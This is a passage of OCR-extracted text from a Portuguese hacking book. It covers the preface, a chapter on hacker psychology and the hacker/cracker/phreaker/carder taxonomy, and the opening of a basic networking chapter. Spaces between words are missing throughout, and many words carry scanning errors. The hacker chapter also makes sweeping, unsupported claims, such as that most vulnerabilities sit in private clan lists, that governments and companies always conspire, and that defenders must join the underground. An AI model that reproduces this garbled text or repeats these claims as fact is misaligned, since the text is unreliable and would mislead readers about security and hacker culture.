requisitos,hackerismobásicoehackerismoavançado.Deixamosnolivro
impressoosassuntossobrehackerismo,eoqueconsideramoscomo"pré-
requisito"(programação,sistemasoperacionaisehardware)incluímosnoCD-
ROMcomoapêndices.
Assim,suprimosasnecessidadesdequemestácomeçando"dozero"enão
penalizamoso"iniciado"compáginascheiasdecoisasqueelejásabe.
Ousoindevidodasinformaçõesaquiprestadas,bemcomodeinformações
apresentadasemqualquerlivro,sejaelesobreredes,servidoresdeInternet,
sistemasoperacionais,programaçãoeoutros,sãodeinteiraresponsabilidadede
quemasutilizou.Valelembrarquenomomentoemqueestelivrofoiredigidojá
estavaemvigoranovaleidecrimesdigitaisnoBrasileaHomelandSecurityAct
nosEstadosUnidos.Alémdisso,éprecisoconsiderarquetodososinfratores
estãosujeitosàlegislaçãodoCódigoPenaledoCódigoCivilnopaís.
Portanto,aproveiteaspróximaspáginasparaampliarseusconhecimentosem
diferentestópicosdomundodainformáticaeparasetornarumverdadeiro
especialistaemsegurança.E,oprincipal,usecomresponsabilidadeeste
conhecimento...
LuisMatos
~2I
Aulainauguraq

Capítulo1
"Sóédignodeseupoderaquelequeo
justificadiaapósdia "/
DagHammarskjold
Secretário-geraldaONUePrêmio
NobeldaPazde1961
I.Ascitaçõesdestelivroestãotodasemsuaslínguasoriginais,àexceção
desta.ComofoiumdiscursonasNaçõesUnidas(e,portanto,oficialmente
traduzidoparaváriaslínguas),preferimoscolocá-Iaemportuguês.

IUniversidadeH4CK3R I
Sim,nós sabemos.Vocêcomprouestelivro paraobterinformaçõestécnicas.
Masnósnãoadotamos
essemodelodecursouniversitárioàtoa:existemcertas
coisasforadaesferatecnológicaquevocêprecisaconhecer,mesmoquenão
estejamuitointeressadonelas.AssimcomonafaculdadedeDireitoestudamos
economiaenadeEngenhariaElétricaestudamosadministração,aquiemnosso
CursoSuperiordeHackerismoteremosdeestudarocomportamento eomodo
depensardaspessoasquededicamsuavidaaessasatividades.
Sevocêcomprouestelivropensandoem"virarumráquer"(comodiriaSusumo
Pop,guitarrista,hackerdoLinux ebancárionashorasvagas),provavelmente
temumanoçãodoquevamostrataraqui.Pareceóbvioquevocêosaiba,jáque
querserumdeles.Recomendamosaleituradestecapítulo,entretanto,poispro-
vavelmentevocêtemidéiascompletamentedistorcidasouromantizadasdo
quesignificaserum"hacker"(noteasaspas).Talvez,apósaleituradestecapítu-
lo,você
queiramudardepostura etornar-seoqueseconstumachamarde"hacker
deverdade";talvezdesistadetudo eváviverdepescaemCaboFriooumesmo
continuecomsuaidéiainicialdepixarsites
einvadircomputadores.
Se,poroutrolado,vocêcomprouestelivropensandoemcomodeixarsuarede,
seuservidorUnixouasestaçõesMaceWmdowsdeseusfimcionáriosmaisseguras,
estaintroduçãoéobrigatória.DenadaadiantaestarantenadonoSecurityFocusou
noshotfixesdaMicrosoft econfigurardeformaparanóicaseubinômio
Firewa1l+AntivtrUs,
sevocênãocompreendercomofimcionaacabeçadequemo
invade.Acredite,vocêvêseusistemapeloladodedentro.Seusinimigosofazem
peloladodefora.Aperspectivapelaqualosinvasoresenxergamsuaredenão
podesequerserimaginadasevocêapenas"segueacartilha".
overdadeiroHackereo~~Hacker"mostrado
namídia
Notíciaveiculadaemumarevistadegrandecirculação:"Emsetembrode2000,
umhackerinvadiuumaindústriadebrinquedosbritânica"...Oquepodemos
depreenderdessafrasepelaformacomoestáescrita?Temosduaspossibilidades:
1Queumapessoausouseusconhecimentosdehackerparainvadirosite
daquelaindústria.Nessainterpretação,apalavrahackernãoestáassociadaà
bandidagem,masàhabilidadedeleemrelaçãoaossistemasdeinformação.Ele
usouessesconhecimentosparaomal,nãosendo oconhecimentoemsialgo
maléfico.
2Que existeumanovaclassedebandidosdigitaischamados"hackers",e
umdelesinvadiuotalsite.Nessainterpretação,apalavrahackerquerdizer,
literalmente,criminosodigital.
1261
PsicologiaHackerr

Universidade1°ano
Umoutroexemplotalvezsejamaisesclarecedor.Imagineumataqueterroris-
tanoPaísBasco,regiãodaEspanha.Oataquefoirealizadoporguerrilheirosdo
gruposeparatistabascoETA,visandoàindependênciadoquejulgamsersua
terra.Anotíciapoderiaserveiculadadaseguinteforma:
"UmabombaexplodiuhojeemumsupermercadoemMadri,matando90
pessoasedeixandoferidasoutras174.Umbasco,guerrilheirodogruposepa-
ratistaETA,assumiuoatentado".
Nesseparágrafoestáimplícitaaidéiadequetodobascoéguerrilheiroeper-
tenceaoETA.OsujeitodaoraçãoébascoenãoguerrilheirodoETA.Deixando
afrasedessaforma,dizemosquequemexplodiuabombafoiumcidadãobasco
quetemcomoadjetivoserguerrilheirodoETA.Umanotíciacomoestapoderia
sermelhorescritadaseguintemaneira:
"UmabombaexplodiuhojeemumsupermercadoemMadri,matando90
pessoasedeixandoferidasoutras174.Umguerrilheirodogruposeparatista
bascoETAassumiuoatentado".
Pronto!Agoratemosapalavraguerrilheirocomosujeitodaoração.Esseguer-
rilheirotemcomoadjetivoaoração"dogruposeparatistabascoETA".Ouseja,
eleé,sim,basco.Masnãonecessariamentetodobascotemaobrigaçãodeser
membrodoETA.
Umoutroexemplo:umpadreéacusadodepedofilia.Amanchetepoderia
ser"padreprocessadoporpedofilia,estuproeseduçãodemenores".Demaneira
análogaàdoshackers,poder-se-iadepreenderdaíqueháumanovacategoriade
taradoschamadospadres.Obviamenteissonãoéverdadeiro,maséoquea
redaçãosemcuidadopodefazerporumacategoriaprofissionaldecente.
Aimprensacomeçouaprestarmaisatençãoaoshackersno[maldadécada
de80.Supomosqueosprimeirosjornalistasqueescreverammanchetessobre
ataquesdigitaistinhamaintençãodeusarapalavraemseusentidocorreto.
Entretanto,construçõesfrasaisambíguascertamentelevaramosleitores,ouvin-
tesetelespectadoresaassociarerroneamenteapalavrahackercomosignifi-
cadodecriminosodigital.Talerronuncafoicorrigido,ehojevemososignifi-
cadoincorretodotermosendoconsagrado.
Aquelamanchetedanossarevistaficariamelhorsereescritaassim:"Emse-
tembrode2000,umespecialistaeminformáticausouseusconhecimentosde
hackerparainvadirumaindústriadebrinquedosbritânica...".Talvezamanche-
tepudessesermantida,masumesclarecimentonoprimeiroparágrafo(oumes-
moemumdosolhosdamatéria)serianecessário.
Estelivro,acontragostodosautores,simplificaotermohackerparaseu
significadopopulareincorreto:criminosodigital.Sabemosquenãoédointe-
ressedacomunidadehackerqueestaconfusãocontinue.Parafinsdidáticos
usaremosotermopopular,massemprecomressalvasdentrodotextoouno
rodapédapágina.
1271
]PsicologiaHacker

IUniversidadeH4CK3R I
Sopadeletrinhas:hackers,crackers,
phreakers...
Antesdetentarmosentrarnaalmadenossosqueridosrebeldes,temosde
fazerumadistinçãoentreeles.Háumacertahierarquiaimpostaaosquedeci-
deminiciarsuajornadapeloconhecimentodaTecnologiadaInformação.Eles
costumamseagruparemsociedadessecretascomumentechamadasdeclãs.
Algunsagem(egostamdeagir)sozinhos.Outrosatuamsoz,inhoseatribuem
suasaçõesatodoumclãtãonumerosoquantofictício.
Nemtodosdesejamrealmentesercriminosos.Algunsagempormotivações
quevãodetorpesanobres,passandopelaestultície.Mastantoos"bons"quan-
toos"maus"hackerssãorebeldesevivememummundoquepossuisuas
idiossincrasias,seusfolcloresemesmosuascrendices.Aestratificaçãodeles
emcamadas2éumdosfolcloresdessemeio.Éóbvioqueessadivisãovariade
clãparaclã.Emalguns,essaclassificaçãoéaceitacomoregra,emoutrosape-
nasinformalmente.Muitosaabominam,taxando-adetolaeinfantil,masvez
poroutraacabamusandoumtermodessesemalgumcanaldeIRe.
-Newbie-Todomundojáfoi,éecertamenteseráinicianteemalgumacoisa.Não
importaseésobrerelacionamentosamorosos,tecnologiasdeInternetoumecânica
deaviação:todostemosumdiaemquenossentamos,pegamosumlivroepensamos
"agoravouaprenderessenegócio".Onewbieéoquechamamosemportuguêsde
inicianteoucalouro.Éapessoaquetempoucosconhecimentoseminformáticae
estáávidaparaaprender.Éousuáriofinalmédiodesistemasdeinformática.
-Luser-Emoposiçãoanewbie,colocamosnomesmobalaioaexpressãopejora-
tivaluser,cunhadapelauniãodaspalavrasinglesasuser(usuário)eloser(perdedor).
Umluser,aocontráriodonewbie,nãoqueraprendernada.Pelocontrário,quersaber
sóomínimonecessárioparaoperarocomputadoretenninaratarefaomaisrápido
possível.Oslusersnormalmentesãousadoscomovítimasintermediáriasdoshackers
parachegaraumobjetivomaior.Onewbiecostumaserchato,masoluseréum
perigo,principalmenteparaapaciênciadopessoaldesuportetécnic03.
-Lamer-Umusuáriocomum(newbieouluser)fatalmenteaprendeausar
algunsprogramas.Nãosabeounãotemcondiçãodesabercomoascoisas
funcionam,masjásabepelomenoscomooperarosaplicativosexistentesno
computador.Umbelodiadescobreumprograminhasimplesqueinvadeas
máquinasdosoutroseapagaseuse-mails,ououtroprograminhaqueexpulsa
pessoasdassalasdechatoOuaindaumprograminhaparaalterarpáginasem
sites.Esseusuárioéoquesechamadelamer,palavraderivadadelamequeem
portuguêsquerdizermancooualeijado.Umlamerécaracterizadonormal-
2Nãousamosaquiotermo"castas"porqueficariasubentenditoquenãohámobilidadeentreelas,como
nacivilizaçãoIndianaBrãmane.Apesardenãogostaremqueoutroshackerssubamnahierarquia,o
objetivodetodohackeréexatamenteeste:aperfeiçoar-setécnica,socialepoliticamente.
3Umadescriçãodecomoovocábuloluserfoicriadopodeserencontrado(eminglês)noJargonFile:
http://www.ianwnflle.comzianwnlbtmI/entry/luser.htmI.Aliás.oJargonFilepodeserusadoparaobteros
signilicadosdequalquertennorelacionadoàtecnologiaeaocomportamentohackerusadonestelivro.
128I
PsicologiaHackerr

Universidade1°ano
mentepelotriodeprogramasqueelesempreemprega:scan,exploitetrojan.
-Wannabe(ouwannabee)-Apalavrafoiusadapelaprimeiraveznamídianos
anos80parasereferiraostasdacantoraMadonnaquesevestiameagiamtentando
imitarseuídolo.Demaneirasemelhante,oswannabeesdainformáticasãousuários
comunsquealmejamserhackers.Otermopodeserusadodeduasmaneiras,uma
positivaeoutrapejorativa.Quandousadodeformapositiva,wannabeéoindivíduo
quejáleubastanteeestáprestesaentrarnoquechamamosdelatvalstage(ou
"entrarnocasulo").Naformapejorativa,wannabeéexatamenteotipoquedescreve-
mosnosprimeirosparágrafosdestecapítulo:alguémquequerentrarnessefantasioso
mundomísticochamadohackerismo,masnãotemamínimaidéiadoquesetrata.
-Larva!stage-literalmente,estágiolarval,tambémchamadodespawn.Éo
períododeisolamentototalpeloqualocandidatoahackertemdepassar
para,nofmaldoprocesso,"nascerdenovo"comoprogramador.Notequepos-
suirhabilidadeemprogramaçãoécondiçãofundamentalparaserconsiderado
hacker,mesmonosentidopopulardapalavra.Oestágiolarvalrestringe-seà
programaçãoepodedurardeseismesesadoisanos.
Nofmaldesteestágio,oprogramadoradquireumasapiênciaquaseesotérica,
emboraapossibilidadedenuncamaisvoltaraumavidanormalsejaopreçoa
pagar.Vocêpodeserumprogramadorcompetentesempassarporisso.Entre-
tanto,nuncachegaráaserummagodocódigo.
-Hacker-Essapalavraandouumlongocaminhoatéchegaraqui.Originalmente
(segundooJargonFile)denominavacarpinteirosquefaziammóveiscommachados
-"hack"éaonomatopéiaparaessasferramentas,eminglês.Nosanos40e50,o
vocábulohackererausadoparacategorizarradioamadoresehobbystasdemecâni-
caoueletrônica.Jánadécadade60,onomesepopularizoucomosinônimode
programador(paraosquesaíramdolatvalstage)eespecialistaemcomputadores,
emborafossecomumutilizá-Ioparadefinirqualquerespecialista:haviamhackersde
astronomia,demecânicadeautomóveisoudejardinagem,porexemplo.
Devidoaojácitadodesserviçoprestadoàcomunidadehackerpelosjornalis-
tas,atualmenteotermotendeasereferiraoscriminososdigitais.Sãoespecia-
listasquejádominamdiversastécnicasdeinvasãoeconhecemcomprofundi-
dadepelomenosumsistemaoperacional.Sãoexcelentesprogramadores(tam-
bémpassarampelafaselarval)eadministradoresdesistemas.
Mas,diferentementedoquepopularmenteseacredita,possuemumrígidocódi-
godeéticaenuncausamseusconhecimentosparaomal,mesmoquesuanoçãode
bemsejacontraalei.Acomunidadehackertradicionalexecracompletamente
estadefinição,preferindosereferirahackersapenascomoprogramadoresees-
pecialistaseminformática.Paraoshackerstradicionais,osquepraticamativida-
desilegais(mesmoquemotivadaspormotivosnobres)sãochamadosdecrackers.
4SegundooJargonFile,umacaracterísticadoswannabeséjustamenteousoexcessivodostermosque
estamosapresentandonestecapítulo.Noverbeteháaindaumainteressantenotahistóricasobreaevolu-
çãodosigniflcadodapalavra.
1291
]PsicologiaHacker

IUniversidadeH4CK3R I
-Cracker-Chamadode"hackerdomal"ou"hackersemética",normalmen-
teéespecializadoemquebrarastravasdesoftwarescomerciaisparapoder
pirateá-Ios(chamadosdewarez-dOOdz),mastambémusaseusconhecimentos
parainvadirsitesecomputadorescomobjetivosilícitos,comovandalismoou
roubo.Muitasvezesoscrackerssãoexcelentesprogramadoresepodemcriar
programasqueinfectemoudestruamcompletamente sistemasalheiossem
deixarvestígios-oslamersnormalmente usamprogramascriadospelos
crackers.Masagrandemaioria
époucacoisamaisespertaqueoslamers.A
diferençaéqueoscrackerssãopersistentes:conhecemefazemusodeuma
miríadedeferramentasparaexplorarvulnerabilidadesconhecidasnossiste-
masquequereminvadir.Umlamerageporimpulsoenãosabeoqueestá
fazendo.Umcrackersabeoquefaze,mesmosendoumhackermedíocre,tem
noçõessuficientespara"sevirar"casoalgumimprevistoocorra.
-Phreaker-Éocrackerdossistemastelefônicos.Possuiconhecimentos
avançadosdeeletrônicaetelefonia(principalmentesobresinalizaçãotelefôni-
ca)epodefazerchamadasdequalquerlocalsempagarporelas.Osmétodos
defraudeincluemtransferirasfaturasparaoutrosnúmeros(válidosounão),
modificartelefonespúblicosparaconseguircréditoilimitadooumesmoenga-
naracentraltelefônicaparaqueelanãofaçaobilling.
-Carder-Éoespecialistaemfraudescomcartõesdecrédito.Sabecomo
conseguirlistasdecartõesválidosemsitesqueosutilizam(sitesdecompras,
dechatpago,etc.),gerarnúmerosfalsosquepassampelaverificaçãoemesmo
roubareclonarcartõesverdadeiros.
-Wardriver-Umtiporecentedecracker.Sabeaproveitarasinúmeras
vulnerabilidadesdasatuaisredessemfio,aschamadaswireless,eseconectara
elas.Oswardriverseuropeusforammaislongeecriaramowarchalking,que
consisteemdesenharcomgiznochãosímbolosqueindicamamelhorposição
deconexãoparaoutroswardrivers.
oquesão,comopensamecomoagem
(eporqueéimportanteconheceressabobagemtoda)
Comojávimos,oshackerssãoespecialistas.Osqueusamseusconhecimentos
parainvadireconseguirinformações(commotivosilícitosounão)sãotãoespecia-
listasquantooshackerstradicionais,trancadosemlaboratóriosnoMITounaUnicamp.
Oshackersassociadosaqualquerdefiniçãodapalavracompartilhamdosmesmos
ideaisecrenças,comvariaçõeslocais,mascomumnúcleocomumbemdefinido.
Aprendizado
Oshackerssãoneuróticosemsuabuscaporconhecimento.Qualquerinforma-
ção,pormínimaqueseja,éumajóiarara.Cadanovosistema,linguagemdeprogra-
130I
PsicologiaHackerr

Universidade1°ano
maçãooumecanismodecriptografiaéumdesafioasersuperado.Dependendode
suasidéiassociaisepolíticas,ohackerpodedecidirinclusivequeosconhecimen-
tosencerradosemumaredeousistemaautônomodevemserabertosaogrande
público,mesmoqueseusigiloestejaresguardadoporleis
-rebeldiaerepúdioa
leisimoraisouinjustassãoquaseobrigatóriasnessemeio.Aidéiadeinvadirum
sistemaparaolhartudo,aprenderomáximopossívelesairsemtocaremnadaé
amplamenteaceitamesmopelosconservadores.Essaspessoasfarãotudooque
estiveraseualcanceparabuscarsemprenovosconhecimentos.
Comprometimento
Umadascaracterísticascomunsatodososhackerséoquecoloquialmente
chamamosdebitolação.Elessãoaficionadosemtudooqueenvolvecomputado-
res,programação,conectividadeetecnologiadainformação.Eosãoaopontode
relaxarnaaparência,deixardecomer,detomarbanhoededormirdurantedias
paraterminarumprogramaimportanteouconseguirinvadiraquelesitefamoso.
Olarva!stageaquenosreferimosanteriormenteéumbomexemplodocom-
prometimentoqueohackertemporseutrabalho,sejaeleremuneradoounão
(mesmohackersqueofazemporhobbyreferem-seaohackerismocomotraba-
lho).Outroexemploéochamadohackmode.Quandoumprogramadorouana-
listadesistemasentraemhackmode,todososrecursosdeseucorpoecérebro
estãoalocadosparaatarefanaqualelepretendehackear.Issoincluiumgrande
poderdeconcentraçãoedeabstração.Quandoumhackerestáemhackmode,é
perfeitamenteaceitávelqueelelevanteamãoparaoutraspessoasemsinalde
"pare",semdizerumapalavra,impedindoassimquealinhaderaciocínioseja
quebrada.Interromperoraciocíniodeumprogramadorenquantoeleestácrian-
doésinônimodeapagartodooseutrabalho:eleteráderecomeçardozero.
Outroexemplodocomprometimentodoshackerséodescuidoquantoà
carreira.Muitosprogramadoreseespecialistasemsistemasrecusampromoções
nasempresasondetrabalhamporqueissoacarretariadeslocá-Iosparaáreas
administrativasegerenciais.Defato,quasequemensalmentelemosnasrevistas
especializadasentrevistascomdiretoresdeinformáticaquedesabafamcomo
repórtersuasaudadedaépocaemque"colocavamasmãosnamassa".
CompartiLhamento
Hackersdequalquerespécie(osdoMITeosdoCrimeBoyz)tambémtêm
emcomumanecessidadedecompartilharconhecimentoerecursos.Issoinclui
escreversoftwarecomcódigoabertoelivreacesso,divulgar100%doconheci-
mentoquepossuiparaacomunidade,facilitaroacessoaessasinformaçõesa
qualquerinteressadoedisponibilizar,semprequepossível,recursosdecom-
putaçãoederede.
Essaéumapaisagemquepodeservistapordiferentesjanelas.Oshackers
tradicionais(ouseja,segundoosignificadocorretodapalavra)pregamo
131I
IPsicologiaHacker

IUniversidadeH4CK3R I
compartilhamentouniversaldoconhecimento.Hámilharesdebonsexemplos
docompartilhamentouniversaleirrestritodeinformações,comoaprópria
Internet,oprojetoGutenberg(http://www.gutenberg.org/).oprojetoGNU
(http://www.gnu.org)eoLinux(http://www.linux.org).
Oshackers/crackerstêmoutranoçãodecompartilhamentodoconhecimen-
to.Paraeles,acooperaçãoéfundamental,masdeveserrecíproca.Issosignifica
quevocêtemdecompartilharprimeiroparaseraceitonoclã.Sódepoisde
julgadopeloclã,vocêteráacessoàbasedeconhecimentodeles.Alémdasin-
formaçõesbásicasedaslivrementeobteníveis,procedimentosdeinvasãoeos
dadosresultantesdelastambémdevemsercompartilhadosentreosmembros
doclã.Hackersnormalmentecolocamdiversosbackdoorsnossistemasinvadi-
dosedivulgaminformaçõessobreessesbackdoors5dentrodeseusclãs.
Oshackersdessesegundotipotêmideais.Oidealdealgunséodinheiroe
paraissonãohesitarãoemroubar,enganarefraudar.Paraoutros,hámotivações
ideológicas,políticasousociais,algumasextremamenteválidas,outrasmoral-
mentequestionáveis.Outrosaindasãovândalosedestroempelopuroprazer
deveroíndioqueimar...Osquepossuemideaiselevadosnormalmenterevelam
apodridãodegovernoseempresasecomoelasnosenganamoulesam.
Édifícilcondenarqualquerumdostipos.Oshackerstradicionais,comsuavisão
academicista,cooperativistaelivre,nosderam,porexemplo,aInternet.
QuadrilhõesdedólaresforamgastosemtecnologiaporempresasI?rivadasdu-
rantetodooséculoXXe,noentanto,oíconeemaiorlegadodatecnologiadesse
períodoéalgoquepessoasdomeiocientíficoofertaramdegraçaàhumanidade.
Jáoshackersdosegundotipo-rebelando-secontrainstituiçõeseleisnem
semprejustasoumoralmentecorretas-nosmostraramqueSIM,ogovernonos
espiona;SIM,asempresasempurramprodutosdemáqualidadeaosconsumi-
dores;eSIM,organizaçõesprivadas,políticasegovernamentaisestãoSEMPRE
conspirandoparacercearnossosdireitos.Companhiasegovernosjogamsujo
nosforçandoausarsistemashorríveis,carosemalescritos,quenosespionam
ecaducammuitorápido."Hackear',então,seriaapenasumaformadedefesa.
Ei!Issoéimportante!
Amaioriadoshackersqueinvademsistemasdeterceiroséadolescenteou
adultomuitojovemeessamísticadosubmundodigitalfazmuitosentidopara
eles.Éclaroqueháhackersmaisvelhosqueaindaestãomergulhadosnesse
mundoàparte,masamaioriaesmagadoraédepessoasmuitojovens.
Algunshackersmaismaduros-quejásuperaramessafantasia-utilizam
essamitologiatodacomoumescudo.Mesmoachandotudoissoumachatea-
5Literalmente,"portadetrás".Éumprograminhaqueoinvasordeixanamáquinainvadidaparasempre
teracessoaela,mesmoqueoadministradortapeabrechapelaqualohackerentrou.Écomoabrirnovos
buracosparaentrarporqueoprimeirofatalmenteseráconsertadopelodonodomuro.
1321
PsicologiaHacker[

Universidade1°ano
çãoextrema("aterriflcbore",comonosdisseLord.Aztael.js),ohackermais
velhoseagremiaaclãs,temumpseudônimovistosoe.1)!6!74u7!1!z4nl)0
35<!:r!7413376comoobjetivodedespistarautoridadesecontinuaranônimo.
Esseéoproblema.AslistasdevulnerabilidadesdesitescomooSecurity
FocusouoLinuxSecuritypossuemapenasosproblemasdescobertospelos
pesquisadoresoudivulgadospeloscrackers.Masnãoseengane:maisde80%
dasvulnerabilidadesestãoemlistasprivadasdeclãshackers,foraasoutras
tantasquesãoconhecidasapenasporindivíduos.Confiarapenasnaslistas
públicasalimentadasporgentequefoiinvadidaeporcrackersqueliberamas
vulnerabilidadesmuitoantigasnãoéumaatitudelámuitosábia.
Istoposto,sevocêestálendoestelivropensandoemsegurarmelhorsua
empresa,necessariamenteterádedesceraosubmundodigitaFeserumdeles.
Nãopensejamaisemseragenteduplo,entretanto:suaredenuncamaisserá
deixadaempazsedescobriremquevocêdeuum"copiar/colar"dalistade
vulnerabilidadesdelesparaseusitedesegurançapreferido.
Porquealguémgastariatempoedinheiro
numainvasão?
Arespostaparaissogiraemtomodeumaúnicapalavra:motivo.Todohacker,seja
bomoumau,possuiummotivoparafazeroquefaz.Podesertorpeouelevado,pode
serporamorouódio,pornecessidade,nillismoouvingança,nãoimporta:motivohá.
Abuscaporconhecimentoparece,àprimeiravista,seromotivomaisimedia-
to.Masnamaioriadoscasoséapenasumobjetivointermediárioparaatingir
algomaior.Seriapossívelescrevervárioslivrossobreosreaismotivosdoshackers.
Cadaindivíduotemsuasprópriasidéias,seuódioeseusamores,suascrenças.
Hápessoasque"hackeiam"pormotivospolíticos,ideológicosouambientais.Na
China,existemváriosgruposlutandoporumaaberturademocráticaeusamaInternet
paraisso.OGreenpeaceegruposneonazistassãooutrosexemplos.Atecnologiaé
utilizada,nessescasos,comoarmasemumaguerra,que,navisãodohacker,éválida.
Outrosofazemporsimplesvandalismo,ouaindaporobjetivostorpes:por-
nografiainfantil,vendadearmasenarcóticosepirataria(comfinseconômi-
cosounão).Oservidordesuaempresaouocomputadordeseuavôpodem
estarsendousadoscomoreservatóriosdeimundicessemquevocêosaiba.Ou
mesmocomotrampolimparaumsistemamaior.
Sejaporideal,porhobbyoucomobjetivoseconômicosilícitos,umainvasão
eaprópriaexistênciadecadahackersemprepossuiummotivooriginal.
6"Digitarutilizandoescritaleet".O133754:r!p7éumaformadeescreverutilizandosímbolosalterna-
tivosdisponíveisnoteclado,ouseja,apenasnoconjuntodecaracteresASCIIestendido.
7Muitosreferem-seaelecomonomeoficialde"DigitalUnderground".
1331
]PsicologiaHacker

RedesI
caPítulo2
'Formi!lionsofyears,manhavelivedjust
liketheanimaIs.Andthensomething
happened,thatunleashedthepowerofour
imagination:welearnedtotalk.'
StephenHawking,cientista,emum
comercialdaAT&T.
1"Pormilhõesdeanos,ahumanidadeviveucomoosanimais.Entãoalgo
aconteceu,quedespertouopoderdenossasmentes:aprendemosafalar."
StephenHawkinggravouessamensagem tambémnacanção"Keep
TaIking",doalbumTheDivisionBell,dogrupoderockPinkFloyd,em1994.

IUniversidadeH4CK3RI
Introducào
I
Ninguéméumailha.Éimpossívelimaginarqueomundomodernopossa
sobreviveroumesmoexistirsemqueaspessoaspossamcomunicar-se.Talvez
emcomunidadesafastadasnosertãodoPiauíumtelefoneàdisposiçãoou
mesmoluzelétricasejamalgosupérfluo,esuafaltasejacontornáve1.Masima-
ginesefaltarcomunicaçõesouenergiaelétricaemumacidadecomoNova
York.Milhõesmorrerão...
Asredesdecomputadoressãoumaespecializaçãodasredestelefônicas,quepor
suavezsãoumaperfeiçoamentodastecnologiasenvolvendoovelhote1egraf02.
Hoje,hácomputadoresligadosportodaanossavolta,epresentesemdiversas
tarefasdonossocotidiano.Bancos,empresas,mercados...Todosutilizamalgum
tipoderedeparaatualizarinformaçõesdeformaeficiente,rápidaesegura.
Nossoobjetivoparaestecapítuloédarumanoçãomuitosuperficialdecomoas
redesfuncionamequaissãoseuscomponentes.Lembremosqueemquase100%
doscasosestamosacessíveisahackersatravésdealgumarede.Mesmoqueos
invasoresutilizem-sedeacessofísicoparainvadiralgumadenossasmáquinas
-ou
seja,possamsentar-seemnossascadeirasedigitardiretamenteemnossosteclados
-,ocontroleposteriordenossamáquinasedará,provavelmente,atravésdealgu-
marede.Osconceitosaquicontidosprovavelmentevãoacrescentarpoucoaos
administradoresmaisexperientes,masservirãocomoferramentasfundamentais
paraabrirasportasaosqueestãocomeçandoaentenderesseuniverso.
Nemestecapítulonemtodoolivrotêmaintençãodeserumtratadocomple-
tosobrecomunicaçãoeredesdecomputadores.Alémdefugirdoobjetivo
principal,seriacomplicadofazê-Iosemfugirdaestimativainicialde350pági-
nasimpressas.Muitosbonslivrosforamescritossobreoassunto,comooex-
celenteRedesdeComputadores,deAndrewTannembaum,ouoslivroson-line
deMorimotodisponíveisnoGuiadoHardware(www.guiadohardware.com).
EaprópriaInternetestácheiadebonstutoriaiseartigossobreoassunto.Não
seprenda,pois,aoexpostoaqui.váemfrente!Sejasafo!Estude!
Conceituação
Astecnologiasqueevoluíramdotelégrafoedatelefoniaparatornarem-seo
queconhecemoshojecomoredesdecomputadorespossuemváriosaspectos
quedevemseranalisadosparaquenossosprojetosderedessejameficientese
seguros.Algunsdessesaspectosbásicossão:
~Estruturafísica:oscomponentesdehardware(mecânicosouelétricos)
quecompõemumarede.Simplificandoadefinição,podemosdizerqueétudo
aquiloquevocêpodetocar.
2Osnorte-americanosclamamparasiainvençãodotelégrnfo,reabnentelevadoacaboporSamuelMorseem
1838(epatenteadoporeleem1840).Masnadécadaanterior,em1830,cientistasinglesesjáhaviamreproduzido
emlaboratórioateoriaqueummisteriosocolegaescocêshaviaproposto70anosantes,em1750.Naopiniãodos
autores,foiesseescocêsanônimo(eleassinouseurelatórioapenascomasiniciais,CM)queinventouotelégrnfo.
1361
Redes1[

Universidade1°ano
~Topologia:comooscomputadoresestãoligadosfisicamenteentresina
rede.Cadaproblemaapresentadopedeumatopologiadiferentepararesolvê-
10,ehásituaçõesemqueváriastopologiascombinadasresolvemoproblema
damelhormaneirapossível.
~Protocolos:asnormasqueregemascomunicaçõesentrecomputadorese
as"línguas"queelesfalamentresi.
Nestecapítulo,apresentaremosum"resumão"cobrindoosprincípiosbá-
sicosdastecnologiasenvolvidas.Ocapítulo8,RedeslI,apresentaráasredes
TCP/IP
-usadasempraticamentetodasasredessériashojeemdia,bemcomo
naInternet-deformamaiscompleta.
Estruturafísica
Existemdiversostamanhosetiposderedes,masopontodepartidapara
elaséomesmo:anecessidadedecomunicaçãoentredoisoumaiscomputado-
res.Asformasdeconexãopodemserasmaisvariadas,desdeparesdecabos
comunsedebaixocusto,passandopeloscaboscoaxiaisefibrasóticasaté
equipamentossemfio.Háaindaoutroscomponentesutilizadosparaexpandir
acapacidadedarede.Entreessescomponentes,podemosdestacar:
~Servidor:máquinacentralresponsávelpeladisponibilizaçãoderecursos
eserviçosnamaioriadasredes.Suafunçãoéagircomofontededadosparaas
configuraçõesdarede,armazenamentodedadoseplataformapararodar
aplicativos,alémdepossuirmecanismosdeautenticaçãoecontroledeacesso
-evitandoassimqueusuáriosacessemrecursosnão-autorizados.Existemdi-
versostiposdeservidores,suaescolhadependedanecessidadeedotamanho
daredeemqueseráinstalado.
~Cliente:éamáquinaqueutilizaráaredeemquestão.Écomelaqueo
usuáriovaiacessarosrecursosdisponíveis,comoserviços,programasedispo-
sitivosdearmazenamentonoservidor,emoutrasmáquinasclienteouemdis-
positivosautônomoscomofaxesouimpressorasremotas.
~Cabos:sãoomeiofísicopormeiodosquaisosdadosserãotransmitidos.
Existemdiversostiposdecabos,esuaescolhavaidependerdotipoderedea
serinstalada,doequipamentoqueseráutilizadoedequantoodonodarede
estádispostoagastar.
~Interfacederede:hardwareresponsávelpelaconexãoentreasmáquinas,
agindocomoportadeentradaesaídaparaacessoao"espaçopúblico"darede.
1371
]Redes1

IUniversidadeH4CK3R I
Equipamentoadicional
~Repetidores:equipamentosqueregenerameletricamente(ouseja,nodo-
mínioanalógico)osinalnosmeiosdetransmissão-normalmentecaboselétri-
cos.Nãosepodeusarmuitosdelesnumamesmarede,poisdegeneramosinalno
domíniodigitalecausamproblemasdesincronismoentreasinterfacesderede.
~Hubs:unidadesquefuncionamcomopontocentraldeconexãoemuma
redelocal.Possuemváriasportasdeconexão,cadaumadestinadaaumcom-
putadordiferente.Todososhubssãotambémrepetidores.
~Bridges:possibilitamdividiraredeemsegmentosautônomos.Comisso,
consegue-sereduzirotráfegonaredetoda,bloqueandodadoscujosegmento
deorigemedestinosejamosmesmosedeixandopassardadoscujosegmento
dedestinosejadiferentedodeorigem.
~Comutadores:tambémchamadosdeswitches,possuemdiversasportas,
assimcomooshubs.Adiferençaéque,internamente,elesegmentaarede,sen-
docadaportaumsegmentodiferente.Aquedanotráfegodarede,coma
utilizaçãodeswitchs,égritante.
~RoteadoreseGateways:equipamentoscapazesdeencaminhardados
entreduasoumaisredesdiferentes.Possueminclusiveumacertainteligência,
podendoencaminharmensagensaredesquenãoestãodiretamenteligadasa
eles.AInternetnadamaisédoqueumagrandemalhaderoteadores.
Abrangência
Alémdoconhecimentodoscomponentesisoladosquecompõesumarede,
énecessárioterumaidéiadecomoelaspodemcobrirdiferentesáreas.Os
nomesdecadacategoria,emboraconsagrados,nãosãotãoimportantes.Co-
